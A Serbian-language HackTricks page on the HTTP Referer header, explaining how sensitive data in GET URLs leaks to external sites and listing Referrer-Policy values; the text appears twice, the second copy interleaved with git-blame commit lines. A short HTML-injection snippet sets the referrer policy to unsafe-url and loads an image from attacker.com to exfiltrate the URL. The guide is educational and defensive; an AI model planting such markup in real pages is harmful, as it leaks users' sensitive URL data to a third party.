hacktricks/todo/interesting-http.md

<details>

<summary><strong>Naučite hakovanje AWS-a od nule do heroja sa</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Drugi načini podrške HackTricks-u:

* Ako želite da vidite svoju **kompaniju reklamiranu na HackTricks-u** ili da **preuzmete HackTricks u PDF formatu** proverite [**PLANOVE ZA PRIJEM**](https://github.com/sponsors/carlospolop)!
* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Otkrijte [**Porodicu PEASS**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family)
* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.

</details>


# Referrer zaglavlja i politika

Referrer je zaglavlje koje koriste pregledači da bi pokazali koja je bila prethodna posjećena stranica.

## Procurene osetljive informacije

Ako se u nekom trenutku unutar web stranice nalaze osetljive informacije u GET zahtevu, ako stranica sadrži linkove ka spoljnim izvorima ili napadač može da navede (socijalno inženjering) korisnika da poseti URL koji kontroliše napadač. Mogao bi da eksfiltrira osetljive informacije unutar poslednjeg GET zahteva.

## Otklanjanje

Možete naterati pregledač da prati **Referrer-policy** koji bi mogao **izbeći** slanje osetljivih informacija drugim web aplikacijama:
```
Referrer-Policy: no-referrer
Referrer-Policy: no-referrer-when-downgrade
Referrer-Policy: origin
Referrer-Policy: origin-when-cross-origin
Referrer-Policy: same-origin
Referrer-Policy: strict-origin
Referrer-Policy: strict-origin-when-cross-origin
Referrer-Policy: unsafe-url
```
## Protivmere

Možete poništiti ovaj pravilo korišćenjem HTML meta oznake (napadač mora iskoristiti HTML ubacivanje):
```markup
<meta name="referrer" content="unsafe-url">
<img src="https://attacker.com">
```
## Odbrana

Nikada nemojte stavljati bilo kakve osetljive podatke unutar GET parametara ili putanja u URL-u.
GitBook: No commit message 2024-04-06 19:39:21 +00:00			`<details>`

			`<summary><strong>Naučite hakovanje AWS-a od nule do heroja sa</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>`

			`Drugi načini podrške HackTricks-u:`

Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA 2024-04-07 04:23:52 +00:00			`* Ako želite da vidite svoju kompaniju reklamiranu na HackTricks-u ili da preuzmete HackTricks u PDF formatu proverite [PLANOVE ZA PRIJEM](https://github.com/sponsors/carlospolop)!`
GitBook: No commit message 2024-04-06 19:39:21 +00:00			`* Nabavite [zvanični PEASS & HackTricks swag](https://peass.creator-spring.com)`
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA 2024-04-07 04:23:52 +00:00			`* Otkrijte [Porodicu PEASS](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [NFT-ova](https://opensea.io/collection/the-peass-family)`
			`* Pridružite se 💬 [Discord grupi](https://discord.gg/hRep4RUj7f) ili [telegram grupi](https://t.me/peass) ili nas pratite na Twitteru 🐦 [@hacktricks_live](https://twitter.com/hacktricks_live).`
GitBook: No commit message 2024-04-06 19:39:21 +00:00			`* Podelite svoje hakovanje trikove slanjem PR-ova na [HackTricks](https://github.com/carlospolop/hacktricks) i [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.`

			`</details>`


Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA 2024-04-07 04:23:52 +00:00			`# Referrer zaglavlja i politika`
GitBook: No commit message 2024-04-06 19:39:21 +00:00
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA 2024-04-07 04:23:52 +00:00			`Referrer je zaglavlje koje koriste pregledači da bi pokazali koja je bila prethodna posjećena stranica.`
GitBook: No commit message 2024-04-06 19:39:21 +00:00
			`## Procurene osetljive informacije`

Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA 2024-04-07 04:23:52 +00:00			`Ako se u nekom trenutku unutar web stranice nalaze osetljive informacije u GET zahtevu, ako stranica sadrži linkove ka spoljnim izvorima ili napadač može da navede (socijalno inženjering) korisnika da poseti URL koji kontroliše napadač. Mogao bi da eksfiltrira osetljive informacije unutar poslednjeg GET zahteva.`
GitBook: No commit message 2024-04-06 19:39:21 +00:00
			`## Otklanjanje`

Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA 2024-04-07 04:23:52 +00:00			`Možete naterati pregledač da prati Referrer-policy koji bi mogao izbeći slanje osetljivih informacija drugim web aplikacijama:`
GitBook: No commit message 2024-04-06 19:39:21 +00:00			```
			`Referrer-Policy: no-referrer`
			`Referrer-Policy: no-referrer-when-downgrade`
			`Referrer-Policy: origin`
			`Referrer-Policy: origin-when-cross-origin`
			`Referrer-Policy: same-origin`
			`Referrer-Policy: strict-origin`
			`Referrer-Policy: strict-origin-when-cross-origin`
			`Referrer-Policy: unsafe-url`
			```
			`## Protivmere`

Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA 2024-04-07 04:23:52 +00:00			`Možete poništiti ovaj pravilo korišćenjem HTML meta oznake (napadač mora iskoristiti HTML ubacivanje):`
GitBook: No commit message 2024-04-06 19:39:21 +00:00			```markup
			`<meta name="referrer" content="unsafe-url">`
			`<img src="https://attacker.com">`
			```
			`## Odbrana`

Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA 2024-04-07 04:23:52 +00:00			`Nikada nemojte stavljati bilo kakve osetljive podatke unutar GET parametara ili putanja u URL-u.`